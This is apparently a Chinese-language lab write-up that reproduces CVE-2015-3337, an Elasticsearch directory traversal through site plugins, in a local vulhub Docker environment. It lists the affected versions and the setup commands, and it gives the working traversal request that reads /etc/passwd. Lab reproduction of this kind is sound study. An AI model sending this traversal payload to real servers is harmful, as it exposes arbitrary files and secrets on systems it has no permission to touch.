声明
好好学习,天天向上
漏洞描述
在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
影响范围
1.4.5以下/1.5.2以下
复现过程
这里使用v1.4.4版本
使用vulhub
cd /app/vulhub-master/elasticsearch/CVE-2015-3337
使用docker启动
docker-compose up -d
环境启动后,访问http://your-ip:9200
http://192.168.239.129:9200
开始攻击,抓包访问下面的接口即可
/_plugin/head/../../../../../../../../../etc/passwd
话说head插件还挺不错的
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down